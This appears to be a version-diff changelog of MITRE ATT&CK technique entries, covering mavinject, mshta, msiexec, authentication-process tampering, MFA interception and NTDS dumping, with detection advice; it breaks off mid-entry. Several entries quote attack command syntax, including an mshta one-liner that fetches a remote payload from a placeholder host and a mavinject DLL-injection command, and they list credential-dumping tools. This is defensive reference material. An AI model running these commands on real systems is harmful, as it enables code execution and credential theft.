| external_references[2]['url'] | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf | https://docs.docker.com/engine/reference/commandline/images/ |
| external_references[3]['source_name'] | Twitter ItsReallyNick Masquerading Update | Elastic Masquerade Ball |
| external_references[3]['description'] | Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019. | Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016. |
| external_references[3]['url'] | https://twitter.com/ItsReallyNick/status/1055321652777619457 | http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf |
| external_references[4]['source_name'] | Docker Images | capec |
| external_references[4]['url'] | https://docs.docker.com/engine/reference/commandline/images/ | https://capec.mitre.org/data/definitions/177.html |
| x_mitre_data_sources[0] | Image: Image Metadata | File: File Metadata |
| x_mitre_data_sources[1] | File: File Metadata | Image: Image Metadata |
| x_mitre_defense_bypassed[0] | Application control by file name or path | Application Control |
| Old Description | New Description |
|---|---|
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject) Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:11:03.446000+00:00 | 2022-04-19 17:35:08.315000+00:00 |
| description | Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)
Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.
In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed) |
| external_references[1]['source_name'] | LOLBAS Mavinject | ATT Lazarus TTP Evolution |
| external_references[1]['description'] | LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. | Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. |
| external_references[1]['url'] | https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ | https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution |
| external_references[2]['source_name'] | ATT Lazarus TTP Evolution | LOLBAS Mavinject |
| external_references[2]['description'] | Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. | LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. |
| external_references[2]['url'] | https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution | https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ |
| external_references[3]['source_name'] | Reaqta Mavinject | Mavinject Functionality Deconstructed |
| external_references[3]['description'] | Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021. | Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. |
| external_references[3]['url'] | https://reaqta.com/2017/12/mavinject-microsoft-injector/ | https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e |
| external_references[4]['source_name'] | Mavinject Functionality Deconstructed | Reaqta Mavinject |
| external_references[4]['description'] | Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. | Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021. |
| external_references[4]['url'] | https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e | https://reaqta.com/2017/12/mavinject-microsoft-injector/ |
| x_mitre_version | 1.0 | 2.0 |
| Description |
|---|
| Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:48:33.990000+00:00 | 2022-10-18 16:28:56.126000+00:00 |
| external_references[2]['source_name'] | Dell Skeleton | Xorrior Authorization Plugins |
| external_references[2]['description'] | Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. | Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021. |
| external_references[2]['url'] | https://www.secureworks.com/research/skeleton-key-malware-analysis | https://xorrior.com/persistent-credential-theft/ |
| external_references[3]['source_name'] | Xorrior Authorization Plugins | Dell Skeleton |
| external_references[3]['description'] | Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021. | Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. |
| external_references[3]['url'] | https://xorrior.com/persistent-credential-theft/ | https://www.secureworks.com/research/skeleton-key-malware-analysis |
| external_references[4]['source_name'] | TechNet Audit Policy | dump_pwd_dcsync |
| external_references[4]['description'] | Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. | Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021. |
| external_references[4]['url'] | https://technet.microsoft.com/en-us/library/dn487457.aspx | https://adsecurity.org/?p=2053 |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Process: OS API Execution | User Account: User Account Modification |
| x_mitre_data_sources[2] | Process: Process Access | User Account: User Account Authentication |
| x_mitre_data_sources[3] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[5] | Module: Module Load | Logon Session: Logon Session Creation |
| x_mitre_data_sources[6] | Windows Registry: Windows Registry Key Modification | File: File Modification |
| x_mitre_detection | Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). |
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Monitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The Store passwords using reversible encryption configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of -AllowReversiblePasswordEncryption $true, Set-ADUser and Set-ADAccountControl. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
|
| x_mitre_version | 2.0 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Audit Policy', 'description': 'Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.', 'url': 'https://technet.microsoft.com/en-us/library/dn487457.aspx'} | |
| x_mitre_data_sources | Application Log: Application Log Content | |
| x_mitre_data_sources | Process: OS API Execution | |
| x_mitre_data_sources | Active Directory: Active Directory Object Modification | |
| x_mitre_data_sources | Process: Process Access | |
| x_mitre_platforms | Azure AD | |
| x_mitre_platforms | Google Workspace | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | SaaS |
| Description |
|---|
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:59:00.395000+00:00 | 2022-03-11 20:38:28.802000+00:00 |
| external_references[1]['description'] | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017. | Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. |
| external_references[1]['url'] | https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf | https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf |
| x_mitre_data_sources[2] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Command: Command Execution |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-07 19:57:26.824000+00:00 | 2022-04-19 17:33:16.346000+00:00 |
| description | Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) |
| external_references[1]['source_name'] | Microsoft msiexec | TrendMicro Msiexec Feb 2018 |
| external_references[1]['description'] | Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. | Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec | https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ |
| external_references[3]['source_name'] | TrendMicro Msiexec Feb 2018 | Microsoft msiexec |
| external_references[3]['description'] | Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019. | Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020. |
| external_references[3]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec |
| x_mitre_data_sources[0] | Process: Process Creation | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: Process Creation |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) | Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 20:35:21.672000+00:00 | 2022-10-31 19:47:26.104000+00:00 |
| name | Two-Factor Authentication Interception | Multi-Factor Authentication Interception |
| description | Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) | Adversaries may target multi-factor authentication (MFA) mechanisms, (I.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011) Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011) Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental) |
| external_references[1]['source_name'] | Mandiant M Trends 2011 | GCN RSA June 2011 |
| external_references[1]['description'] | Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016. | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. |
| external_references[1]['url'] | https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf | https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/ |
| external_references[2]['source_name'] | GCN RSA June 2011 | Mandiant M Trends 2011 |
| external_references[2]['description'] | Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018. | Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016. |
| external_references[2]['url'] | https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx | https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Process: OS API Execution |
| x_mitre_data_sources[2] | Process: OS API Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-14 23:08:02.782000+00:00 | 2022-03-08 21:00:52.774000+00:00 |
| description | Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
|
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may 